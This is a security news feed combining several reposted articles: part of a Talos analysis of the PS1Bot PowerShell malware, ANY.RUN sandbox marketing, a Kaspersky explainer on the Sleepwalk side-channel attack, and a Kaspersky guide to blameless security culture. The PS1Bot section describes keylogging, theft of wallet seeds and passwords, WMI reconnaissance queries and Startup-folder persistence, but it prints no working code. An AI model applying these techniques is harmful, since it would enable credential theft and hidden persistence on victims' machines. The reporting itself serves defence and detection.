Figure 11. Password file detection criteria.
Once the sensitive information has been collected, it is then compressed and exfiltrated to the attacker’s C2 server.
Figure 12. Compressed archive exfiltration logic.
Data compression and exfiltration is performed via an HTTP POST request, as shown in Figure 13.
Figure 13. Example HTTP POST containing compressed archive.
Any discovered wallet seed phrases are communicated to the attacker using HTTP GET requests, using a format similar to the one in Figure 14.
Figure 14. Transmission of detected wallet seed phrase contents.
This demonstrates a robust information stealer that, in this case, has been implemented as a PowerShell module.
Keylogger
The keylogging and clipboard capture module is implemented similarly to the screen capture module described earlier, with PowerShell being used to dynamically compile and execute a C# assembly DLL at runtime.
Figure 15. Example use of Add-Type in PowerShell.
The keylogger uses SetWindowsHookEx() to monitor keyboard and mouse events to facilitate the capture of keystrokes and mouse activity on the system.
Figure 16. Example SetWindowsHookEx() logic.
Clipboard contents are also monitored so that information copied can be dynamically logged as well. As with other modules, status logging has been implemented and is performed via HTTP GET requests, an example of which is:
The module also relays this status in the body of an HTTP POST request.
Figure 17. Status logging transmission to C2.
Collected data is transmitted to the attacker via HTTP POST requests similar to Figure 18.
Figure 18. Keystroke log transmission.
Information collection
We have also observed the delivery of a system survey module that the attacker refers to as “WMIComputerCSHARP” that is used to collect and transmit information about the infected system and environment to the attacker. Consistent with the design of the screenshot and keylogging modules, this module is implemented using a combination of PowerShell and C# and features the use of runtime compilation.
The module uses WMI to query the domain membership information of the infected system, likely to enable the attacker to perform reconnaissance to determine if they were successful in gaining access to a high value target.
Figure 19. Survey collection status logging message.
The following WMI queries are performed as part of this process:
SELECT Domain, PartOfDomain FROM Win32_ComputerSystem
SELECT DomainName FROM Win32_NTDomain WHERE ClientSiteName IS NOT NULL
In addition, the %USERDNSDOMAIN% environment variable is also queried to attempt to enumerate the domain membership of the infected system. The collected information is transmitted to the attacker’s C2 server, consistent with what was described for other modules.
Figure 20. Example status logging implementation.
Persistence
We have also observed the delivery of a persistence module that can be used as desired to ensure that the main looping mechanism is re-executed following a system restart or user session termination. This allows for the reestablishment of a C2 communications channel and enables the delivery of additional modules as desired by the adversary.
The module begins by attempting to create a PowerShell script that will be executed each time the system restarts. The module creates a randomly generated directory within the %PROGRAMDATA% directory that will be used to store the components needed for persistence. These include a randomly-named PowerShell script (PS1) as well as a randomly-named shortcut file (ICO). A malicious randomly-named LNK file is also created in the Startup directory that is configured to point to the PowerShell script previously created so that it can be executed each time the system is rebooted.
The ICO file is created using base64-encoded content delivered as part of the module itself. The PowerShell script contents are generated by retrieving an obfuscated blob from the C2 server, which in our sample was hosted at the URL path /transform.
Figure 22. Persistence payload retrieval.
A simulated example of this process is shown in Figure 23.
Figure 23. Simulated delivery of obfuscated persistence payload.
This content is then written to the PS1 file and the LNK file is generated with the appropriate parameters to enable execution in the future. When deobfuscated, the contents of the PowerShell simply contain the same logic used to establish the C2 polling process previously described early in the infection chain.
Figure 24. Deobfuscated persistence payload.
We assess with high confidence that there are likely additional modules available for deployment as-needed by the adversary and the use of this framework provides a flexible means to enhance and increase the functionality available rapidly as needed.
Links to previous intrusion activity
During our analysis of the code and functionality associated with this infection chain, we observed similarities with components referenced in prior reporting related to the use of Skitnet/Bossnet to deliver PowerShell modules to infected systems. We have also observed multiple overlaps in the C2 infrastructure used in this campaign and the one described by the aforementioned reporting. Additionally, we assess with high confidence that the final deobfuscated payload dropped by the persistence module previously described was likely created by the same entity who created the PowerShell script described in the prior reporting. The overall implementation, use of specific variables throughout the code, and matching C2 URL construction strengthen this assessment. Below is a comparison of the code in both instances.
Figure 25. Comparison of persistence payload (left) vs. ProDaft reporting (right).
As observable in Figure 25, the only difference between the two samples is the addition of mutex handling and sleep periods.
While Talos did not identify any direct overlap in activity related to these malware families, we noted similarities in the design architecture and functionality provided by the PS1Bot malware delivered in this case and that present in another malware family Talos previously reported on called AHK Bot. The derivation of the C2 URL path based on the drive serial number is consistent across both malware families. Likewise, the use of a main polling script and subsequent delivery and execution of purpose-built modules is also similar to the design architecture found with AHK Bot. There are also several similarities in the types of modules available for both malware families. Heavy use of URL parameters when communicating with C2 is another similarity between the two families.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for the threats are:
Snort2: 65231 – 65233
Snort3: 65231 – 65233
ClamAV detections are also available for this threat:
Win.Backdoor.PS1Bot-10056514-0
Win.Backdoor.PS1Bot-10056515-0
Win.Backdoor.PS1Bot-10056516-0
Win.Backdoor.PS1Bot-10056517-0
Win.Backdoor.PS1Bot-10056518-0
Win.Backdoor.PS1Bot-10056519-0
Win.Backdoor.PS1Bot-10056520-0
Win.Backdoor.PS1Bot-10056521-0
Win.Backdoor.PS1Bot-10056522-0
Win.Backdoor.PS1Bot-10056523-0
Win.Backdoor.PS1Bot-10056524-0
Win.Backdoor.PS1Bot-10056525-0
Win.Backdoor.PS1Bot-10056526-0
Win.Backdoor.PS1Bot-10056527-0
Win.Backdoor.PS1Bot-10056528-0
Win.Backdoor.PS1Bot-10056529-0
Win.Backdoor.PS1Bot-10056530-0
Win.Backdoor.PS1Bot-10056531-0
Win.Backdoor.PS1Bot-10056532-0
Win.Backdoor.PS1Bot-10056533-0
Win.Backdoor.PS1Bot-10056534-0
Win.Backdoor.PS1Bot-10056535-0
Win.Backdoor.PS1Bot-10056536-0
Win.Backdoor.PS1Bot-10056537-0
Win.Backdoor.PS1Bot-10056538-0
Win.Backdoor.PS1Bot-10056539-0
Win.Backdoor.PS1Bot-10056540-0
Win.Backdoor.PS1Bot-10056541-0
Win.Backdoor.PS1Bot-10056542-0
Indicators of compromise (IOCs)
IOCs for this threat can be found in our GitHub repository here.
Editor’s note: The current article was originally published on November 26, 2020, and updated on August 12, 2025.
If you’re an independent malware analyst or threat researcher, you need a solution that works as hard as you do; one that’s flexible, private, and built for deep, hands-on investigations.
Hunter puts that power in your hands. With 70% of ANY.RUN’s Interactive Sandbox capabilities, you can dive into advanced investigations, expose hidden threats, and keep every detail locked down.
Let’s look at why so many solo analysts make Hunter their plan of choice.
Keep Your Analyses Secure
Hunter plan advantages you can’t miss
The Hunter plan gives analysts the privacy they need to work with sensitive samples confidently.
You decide who can access your submissions, whether you want to keep them completely private, share with a trusted contact, or display them in a controlled presentation mode.
Benefits of private sandbox analyses
This control is backed by strong security measures that protect your data at every stage:
Our SOC 2 Type 1 certification is backed by independent assessments, verifying that we have robust controls in place to protect user data, private malware analyses, and system integrity
Data is encrypted at rest with AES-256, ensuring stored files remain secure against unauthorized access.
Detect threats faster with ANY.RUN’s Interactive Sandbox See full attack chain in seconds for immediate response
Hunter enables rapid, controlled analysis of suspicious files and URLs across a range of environments, from Windows 7, 10, and 11 to Linux and Android. In most investigations, the sandbox delivers a reliable verdict in under 40 seconds, allowing analysts to act without delay.
By fully detonating each attack and interacting with it at every stage, you can observe its complete execution chain, including those steps designed to evade automated tools. Detonation actionsand environment fine-tuning work together to make threat identification both precise and efficient, even when dealing with multi-layered or highly evasive malware.
The intuitive interface makes it easy to navigate complex analyses, while helping analysts of all experience levels deepen their expertise with every investigation.
Real-World Example of Phishing Attack
One real-world case shows exactly why this capability matters.
Fake document with malicious PDF displayed inside ANY.RUN sandbox
A phishing email arrived with an SVG attachment and a password hidden in the message body. Opening the SVG in the sandbox revealed a fake document containing a link to download a PDF. Clicking that link triggered the download of a ZIP archive; one that could only be extracted by manually entering the earlier password.
Entering password hidden in the message body
Inside was an executable file. When run, ANY.RUN immediately flagged it as AsyncRAT — a remote access trojan capable of spying on and controlling infected systems.
AsyncRAT detected by ANY.RUN sandbox
Without interactivity, this chain would have remained hidden. A fully automated tool wouldn’t have clicked the link, copied the password, or opened the archive, leaving the threat undetected.
Here, the AI Assistant also stepped in to summarize the full chain of actions, making it easier for a junior analyst to quickly understand the threat without manually piecing together every detail.
Network activity visibility, enabling the team to block C2 communications before data exfiltration
Gain Better Visibility into Threat Behavior
Hunter helps you understand exactly how malware operates, so you can respond with precision.
Inside the analysis session, you can view MITRE ATT&CK®-mapped TTPs to see which tactics and techniques the threat uses. This makes it easier to assess the attack’s sophistication, connect it to known threat actors, and prioritize the right defensive actions.
You can also explore attack patterns through the process graph and triggered rules, visualizing every step of the execution chain. This helps analysts quickly grasp complex behaviors, uncover hidden stages, and spot anomalies that might otherwise be missed.
When the investigation is complete, you can generate detailed reports with IOCs, ready for sharing with colleagues, integrating into SIEM or EDR systems, or using to update detection rules. This ensures your findings don’t just stay in the lab but actively strengthen defenses.
Real-World Example: Gootloader Infection Chain
A live Gootloader case in the Hunter sandbox begins with a user landing on a compromised website while searching for something business-related, such as a contract template. The site delivers a ZIP file containing a trojanized JavaScript file disguised as a common library like jQuery. Once opened, the script runs via wscript.exe, launching a heavily obfuscated payload.
Analysis of the Gootloader Node.js malware inside ANY.RUN’s Interactive Sandbox
The process graph shows the full attack chain: the first-stage payload drops a second-stage JavaScript file, creates a scheduled task for persistence, and hands execution from wscript.exe to cscript.exe, which then spawns a PowerShell process.
ANY.RUN’s process graph with full attack chain
Mapped TTPs in the MITRE ATT&CK® section reveal multiple techniques, including system reconnaissance, persistence via scheduled tasks, and data exfiltration through HTTP headers.
PID 7828 with its exposed techniques and tactics inside ANY.RUN sandbox
At the end of the investigation, a detailed report with IOCs is generated, containing domains, file hashes, and registry keys. These can be shared instantly with your team or imported into security tools to block future attacks.
Well-structured report generated by ANY.RUN sandbox
Uncover Evasive Malware Designed to Evade Detection
Some threats are designed to stay hidden, activating only under specific system conditions, locales, or network environments. Hunter equips you with the tools to expose them.
You can dissect samples in depth by inspecting network traffic, registry modifications, and running processes, giving you a complete picture of the malware’s activity and persistence mechanisms. This visibility is critical for detecting hidden payloads and spotting malicious behavior that traditional scanners might miss.
Hunter also lets you gather unique IOCs directly from malware configurations and Suricata IDS detections. These high-confidence indicators can be used to update detection rules, block malicious infrastructure, and improve threat-hunting accuracy across your environment.
Finally, you can investigate in-depth by customizing the OS, installed tools, and network settings. Switch locales, adjust keyboard languages, or route traffic through specific regions using a residential proxy to bypass geofencing. This flexibility enables you to trigger and observe behaviors that would otherwise remain dormant, ensuring no evasion technique goes unnoticed.
Revealing Geofenced Malware with Locale and Network Routing
Some malware is geofenced, checking the geolocation of the infected host before delivering a payload. If the system isn’t in a target country, the attack simply won’t proceed.
With Hunter, you can bypass these restrictions by changing the system locale and routing traffic through another region, either via TOR or a residential proxy.
In this case, a malicious document with an Italian-language template was analyzed in a default en-US environment. The Regsvr32.exe process launched but didn’t receive any payload, terminating shortly after. Restarting the analysis with the locale set to it-IT and routing traffic through Italy via TOR revealed the hidden threat: Ursnif (Gozi) was successfully downloaded as a payload.
Detection of Ursnif (Gozi) malware using TOR inside ANY.RUN sandbox
This combination of environment customization and network rerouting allows analysts to uncover full attack chains, capture critical IOCs, and study malware that would otherwise remain invisible in automated or default setups.
Scale Early Threat Detection, Reduce Business Risks with Enterprise Plan
ANY.RUN’s Enterprise plan is a comprehensive solution for SOC teams
Built for SMBs, large enterprises, MSSPs, and government agencies, the Enterprise plan gives SOC teams the full power of ANY.RUN’s Interactive Sandbox, with advanced capabilities for security, automation, and collaboration.
Key ANY.RUN stats
+36% average detection rate improvement in SOC environments
20% workload reduction for Tier 1 analysts through automated triage
21 minutes faster MTTR per case boosting overall SOC efficiency
Up to 3x overall SOC performance gains when scaling across large teams
30% fewer escalations from Tier 1 to Tier 2, thanks to skill-building through interactive analysis
Trusted by 15,000+ organizations across finance, telecom, retail, government, and healthcare
Enterprise is designed for teams that need to investigate faster, work together seamlessly, and stay ahead of evolving threats.
ANY.RUN’s Enterprise plan provides teamwork functionality
With Enterprise, you can:
Slash business risk with early threat detection to prevent costly damage to your infrastructure and reputation.
Cut MTTR through quick triage and clear threat insights that speed up decisive threat response.
Increase detection rate by analyzing all types of Windows, Linux (including ARM), and Android files to identify more threats faster.
Enhance productivity by automating routine tasks to help teams focus on critical incidents with less fatigue.
Develop analyst expertise through hands-on, guided analysis that doubles as real-world training and saves on resources on onboarding.
Protect sensitive data with private analyses, compliance with strict security frameworks, and isolated working environments.
Collaborate seamlessly with shared investigations, role-based permissions, and productivity tracking for the whole SOC.
ANY.RUN’s Enterprise plan provides customizable integration with your security stack
Enterprise provides API/SDK access that lets SOC teams utilize ANY.RUN’s connectors for popular security solutions like SIEM, XDR, TIP systems to streamline workflows and increse response speed even further.
Sandbox for Businesses
Boost performance of your SOC with the Enterprise plan designed for SMBs, MSSPs, enterprise companies, and government organizations.
See details
Case Study: Expertware Cuts Investigation Time by 50%
Challenge: Expertware, a leading European MSSP, needed to accelerate malware investigations, cut down on manual processes, and deliver faster, higher-quality results to its clients.
Result: By adopting ANY.RUN Enterprise, Expertware reduced investigation turnaround time by 50%, boosted SOC efficiency with real-time collaborative analysis and shared reports, and gained complete visibility into multi-stage and fileless attacks, from initial macro execution to C2 communications. These improvements allowed them to deliver clearer, more actionable reports, enabling clients to respond before threats escalated.
“ANY.RUN’s interactive approach was critical in dissecting a complex multi-stage XLoader campaign and swiftly mitigating its impact across our network.” — Expertware, Leading European MSSP
Ready to Get Started?
Whether you need the agility of Hunter or the full-scale power of Enterprise, ANY.RUN gives you the solutions to detect, investigate, and stop threats faster.
Contact us for a trial or a personalized quote today.
About ANY.RUN
Designed to accelerate threat detection and improve response times, ANY.RUN equips teams with interactive malware analysis capabilities and real-time threat intelligence.
ANY.RUN’s cloud-based sandbox supports investigations across Windows, Linux, and Android environments. Combined with Threat Intelligence Lookup and Feeds, our solutions give security teams full behavioral visibility, context-rich IOCs, and automation-ready outputs, all with zero infrastructure overhead.
Ready to see how ANY.RUN’s services can power your SOC?
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 13:06:382025-08-12 13:06:38Hunter Plan: Fast and Private Threat Analysis for Solo Malware Researchers
Information security has multiple layers of complexity. Effective yet technically simple attacks through phishing emails and social engineering are well known about. We also often post about sophisticated targeted attacks that exploit vulnerabilities in enterprise software and services. And among the most sophisticated are attacks that exploit fundamental hardware features. Although such attacks aren’t cheap, the cost doesn’t deter all threat actors. Or at least researchers.
Researchers at two US universities recently published a paper with a fascinating example of an attack on hardware. Using the standard operating system feature for switching between tasks, the researchers developed an attack they named Sleepwalk, which can crack a cutting-edge data encryption algorithm.
Side-channeling — sleep-walking
Sleepwalk is a type of side-channel attack. In this context, “side channel” typically refers to any method of stealing secret information by indirect observation. For example, imagine someone is typing a password on a keyboard. You can’t see the letters/symbols, but you can hear the keys being pressed. This is a feasible attack in which the sound of the keystrokes — the side channel — reveals what text is being typed. A classic example of a side channel is monitoring changes in the power consumption of a computer system.
Why does power consumption vary? Simple: different computing tasks require different resources. Serious number crunching will max out the load on the CPU and RAM, while typing in a text editor will see the computer mostly idle. In some cases, changes in power consumption give away sensitive information, such as private keys for data encryption. This is similar to how a few barely audible clicks can reveal the correct rotor positions to pick the combination lock on a safe.
Why are these attacks sophisticated? Because a computer performs multiple tasks simultaneously. And all of them affect power consumption in one way or another. Extracting useful information from this noise is a highly complex job. Even when analyzing the simplest devices such as smart card readers, researchers take hundreds of thousands of measurements in a short period, repeating them tens or hundreds of times, then apply sophisticated signal-processing methods to confirm or refute the possibility of a side-channel attack. Sleepwalk in a sense simplifies this work: the researchers were able to extract useful information by measuring the pattern of power consumption just once, during a so-called context switch.
Voltage fluctuations during CPU context switching. Source
Context switching
We’re all used to switching between programs on a computer or smartphone. At a deeper level, such multitasking is enabled by various mechanisms behind the scenes, one of which is context switching. The state of one program is saved, while data from another is loaded into the CPU. The decision on which program to give priority to, and when, is made by the operating system. That said, there’s a simple way for a programmer to force a context switch by adding a sleep instruction to the program code. The operating system then sees that the program doesn’t require CPU power for the time being, and switches to another task. Context switching, especially when the sleep function is called, is an energy-consuming activity that requires saving the state of one program and loading data from another into the CPU. The screenshot above shows a spike in the measured voltage during such a switch.
As it turns out, the nature of this power spike is determined both by the task that was running before and by the data being processed. Essentially, the researchers hugely simplified implementing a side-channel attack in which the system’s energy consumption is measured. Instead of measuring over a long period, a single spike is analyzed at a predetermined time. This serves up indirect data of two types: what program was running before the switch, and what data was being processed. All that remains is to carry out the attack according to the scheme below:
The researchers did their experiments on a single-board Raspberry Pi 4, demonstrating first of all that the power spike produced by different computing tasks during context switching has a unique fingerprint. Let’s suppose that this computer is performing data encryption. We can feed any text to the encryption algorithm as input, but we don’t know the key for encrypting the data.
What if we trigger a context switch at a specific point in the encryption algorithm’s operation? The operating system will save the state of the program, causing a spike in power consumption. Using an oscilloscope to repeatedly measure the nature of this spike, the researchers were able to extract the secret key!
That was just one of many important things learned in the experiment. They also succeeded in fully reconstructing a SIKE private key. The fairly new encryption algorithm SIKE is proposed as a replacement for traditional algorithms to protect data even in the quantum age. Yet despite its apparent innovativeness, questions are already being asked about the algorithm’s strength. Moreover, to extract the secret key, the researchers didn’t just carry out a Sleepwalk attack, but also exploited a weakness in the algorithm itself.
The Sleepwalk attack was unable to fully crack the traditional and reliable (but not post-quantum) AES-128 algorithm. But the team was able to reconstruct 10 of the 16 bytes of the private key — and this in itself is an achievement since Sleepwalk is somewhat simpler than other side-channel attack methods.
Sure, there’s no talk yet of deploying Sleepwalk in practice. The researchers merely wanted to demonstrate that power spikes during context switching can reveal secret information. Which they did. But bad guys one day might be able to develop the attack so as to steal real secrets — be they from a computer, secure flash drive, or crypto wallet.
As result of this research, existing and in-development encryption algorithms should become a little more reliable. Not only that, the Sleepwalk attack indirectly points up a key aspect in the implementation of cryptographic systems. Future algorithms will need to be resistant to analysis using quantum computing (so-called “post-quantum cryptography”); but no less vitally, this will need to be done correctly. Otherwise, a new, theoretically more secure algorithm may turn out to be more vulnerable to traditional attacks than a pre-quantum one.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 11:06:492025-08-12 11:06:49Sleepwalk: a sophisticated way to steal encryption keys | Kaspersky official blog
The attacks used spearphishing campaigns to target financial, manufacturing, defense, and logistics companies in Europe and Canada, ESET research finds
ESET Research discovered a zero-day vulnerability in WinRAR being exploited in the wild in the guise of job application documents; the weaponized archives exploited a path traversal flaw to compromise their targets
Even companies with a mature cybersecurity posture and significant investments into data protection aren’t immune to cyber-incidents. Attackers can exploit zero-day vulnerabilities or compromise a supply chain. Employees can fall victim to sophisticated scams designed to breach the company’s defenses. The cybersecurity team itself can make a mistake while configuring security tools, or during an incident response procedure. However, each of these incidents represents an opportunity to improve processes and systems, making your defenses even more effective. This isn’t just a rallying call; it’s a practical approach that’s been successful enough in other fields such as aviation safety.
In aviation, almost everyone in the aviation industry — from aircraft design engineers to flight attendants – is required to share information to prevent incidents. This isn’t limited to crashes or system failures; the industry also reports potential problems. These reports are constantly analyzed, and security measures are adjusted based on the findings. According to Allianz Commercial’s statistics, this continuous implementation of new measures and technologies has led to a significant reduction in fatal incidents — from 40 per million flights in 1959 to 0.1 in 2015.
Still in aviation, it was recognized long ago that this model simply won’t work if people are afraid to report procedure violations, quality issues, and other causes of incidents. That’s why aviation standards include requirements for non-punitive reporting and a just culture, meaning that reporting problems and violations shouldn’t lead to punishment. DevOps engineers have a similar principle they call a blameless culture, which they use when analyzing major incidents. This approach is also essential in cybersecurity.
Does every mistake have a name?
The opposite of a blameless culture is the idea that “every mistake has a name”, meaning a specific person is to blame. Under this approach, every mistake can lead to disciplinary action, including termination. This principle is considered harmful and doesn’t lead to better security.
Distorted or partially destroyed evidence complicates the response and worsens the overall outcome because security teams can’t quickly and properly assess the scope of a given incident.
Zeroing in on one person to blame during an incident review prevents the team from focusing on how to change the system to prevent similar incidents from happening again.
Employees are afraid to report violations of IT and security policies, causing the company to miss opportunities to fix security flaws before they lead to a critical incident.
Employees have no motivation to discuss cybersecurity issues, coach one another, or correct their coworkers’ mistakes.
To truly enable every employee to contribute to your company’s security, you need a different approach.
The core principles of a just culture
Call it “non-punitive reporting” or a “blameless culture” — the core principles are the same:
Everyone makes mistakes. We learn from our mistakes; we don’t punish them. However, it’s crucial to distinguish between an honest mistake and a malicious violation.
When analyzing security incidents, the overall context, the employee’s intent, and any systemic issues that may have contributed to the situation all need considering. For example, if a high turnover of seasonal retail employees prevents them from being granted individual accounts, they might resort to sharing a single login for a point-of-sale terminal. Is the store administrator at fault? Probably not.
Beyond just reviewing technical data and logs, you must have in-depth conversations with everyone involved in an incident. For this you should create a productive and safe environment where people feel comfortable sharing their perspectives.
The goal of an incident review should be to improve behavior, technology, and processes in the future. Regarding the latter for serious incidents, they should be split in to two: immediate response to mitigate the damage, and postmortem analysis to improve your systems and procedures.
Most importantly, be open and transparent. Employees need to know how reports of issues and incidents are handled, and how decisions are made. They should know exactly who to turn to if they see or even suspect a security problem. They need to know that both their supervisors and security specialists will support them.
Confidentiality and protection. Reporting a security issue should not create problems for the person who reported it or for the person who may have caused it — as long as both acted in good faith.
How to implement these principles in your security culture
Secure leadership buy-in. A security culture doesn’t require massive direct investment, but it does need consistent support from the HR, information security, and internal communications teams. Employees also need to see that top management actively endorses this approach.
Document your approach. The blameless culture philosophy should be captured in your company’s official documents — from detailed security policies to a simple, short guide that every employee will actually read and understand. This document should clearly state the company’s position on the difference between a mistake and a malicious violation. It should formally state that employees won’t be held personally responsible for honest errors, and that the collective priority is to improve the company’s security, and prevent future recurrences.
Create channels for reporting issues. Offer several ways for employees to report problems: a dedicated section on the intranet, a specific email address, or the option to simply tell their immediate supervisor. Ideally, you should also have an anonymous hotline for reporting concerns without fear.
Train employees. Training helps employees recognize insecure processes and behaviors. Use real-world examples of problems they should report, and walk them through different incident scenarios. You can use our online our online Kaspersky Automated Security Awareness Platform to organize these cybersecurity-awareness training sessions. Motivate employees to not only report incidents, but also to suggest improvements and think about how to prevent security problems in their day-to-day work.
Educate your leadership. Every manager needs to understand how to respond to reports from their team. They need to know how and where to forward a report, and how to avoid creating blame-focused islands in a sea of just culture. Teach leaders to respond in a way that makes their coworkers feel supported and protected. Their reactions to incidents and error reports needs to be constructive. Leaders should also encourage discussions of security issues in team meetings to normalize the topic.
Develop a fair review procedure for incidents and security-issue reports. You’ll need to assemble a diverse group of employees from various teams to form a “no-blame review board”. It will be responsible for promptly processing reports, making decisions, and creating action plans for each case.
Reward proactivity. Publicly praise and reward employees who report spearphishing attempts or newly discovered flaws in policies or configurations, or who simply complete awareness training better and faster than others on their team. Mention these proactive employees in regular IT and security communications such as newsletters.
Integrate findings into your security management processes. The conclusions and suggestions from the review board should be prioritized and incorporated into the company’s cyber-resilience plan. Some findings may simply influence risk assessments, while others could directly lead to changes in company policies, or implementation of new technical security controls or reconfiguration of existing ones.
Use mistakes as learning opportunities. Your security awareness program will be more effective if it uses real-life examples from your own organization. You don’t need to name specific individuals, but you can mention teams and systems, and describe attack scenarios.
Measure performance. To ensure this process is working and delivering results, you need to use information security metrics as well as HR and communications KPIs. Track the MTTR for identified issues, the percentage of issues discovered through employee reports, employee satisfaction levels, the number and nature of security issues identified, and the number of employees engaged in suggesting improvements.
Important exceptions
A security culture or blameless culture doesn’t mean that no one is ever held accountable. Aviation safety documents on non-punitive reporting, for example, include crucial exceptions. Protection doesn’t apply when someone knowingly and maliciously deviates from the regulations. This exception prevents an insider who has leaked data to competitors from enjoying complete impunity after confessing.
The second exception is when national or industry regulations require individual employees to be held personally accountable for incidents and violations. Even with this kind of regulation, it’s vital to maintain balance. The focus should remain on improving processes and preventing future incidents — not on finding who’s to blame. You can still build a culture of trust if investigations are objective and accountability is only applied where it’s truly necessary and justified.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-11 13:06:412025-08-11 13:06:41How to implement a blameless approach to cybersecurity | Kaspersky official blog
Key ANY.RUN stats
